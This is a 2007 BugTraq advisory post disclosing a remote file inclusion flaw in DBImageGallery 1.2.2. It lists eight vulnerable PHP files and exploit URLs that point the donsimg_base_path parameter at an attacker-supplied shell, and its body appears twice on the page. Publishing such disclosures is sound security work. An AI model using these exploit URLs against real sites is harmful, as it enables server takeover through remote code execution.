BugTraq
Back to list
|
Post reply
Remote File Include In DBImageGallery
Mar 02 2007 01:30PM
RaeD Hasadya (raed bsdmail com)
Remote File Include In DBImageGallery 1.2.2
Discovered By : Hasadya Raed
Contact Me : RaeD (at) BsdMail (dot) Com [email concealed]
Download Script :
http://www.dbscripts.net/download/?file=1
B.Files:
admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_base_path
admin/scan.php -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php -> require_once $donsimg_base_path
includes/images.php -> require_once $donsimg_base_path
includes/utils.php -> require_once $donsimg_base_path
includes/values.php -> require_once $donsimg_base_path
Exploits :
http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell
-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Att
ack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attac
k]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Sh
ell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shel
l-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-
Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-A
ttack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-
Attack]
--
_______________________________________________
Get your free email from http://bsdmail.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Discovered By : Hasadya Raed
Contact Me : RaeD (at) BsdMail (dot) Com [email concealed]
Download Script :
http://www.dbscripts.net/download/?file=1
B.Files:
admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_base_path
admin/scan.php -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php -> require_once $donsimg_base_path
includes/images.php -> require_once $donsimg_base_path
includes/utils.php -> require_once $donsimg_base_path
includes/values.php -> require_once $donsimg_base_path
Exploits :
http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell
-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Att
ack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attac
k]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Sh
ell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shel
l-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-
Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-A
ttack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-
Attack]
--
_______________________________________________
Get your free email from http://bsdmail.com
[ reply ]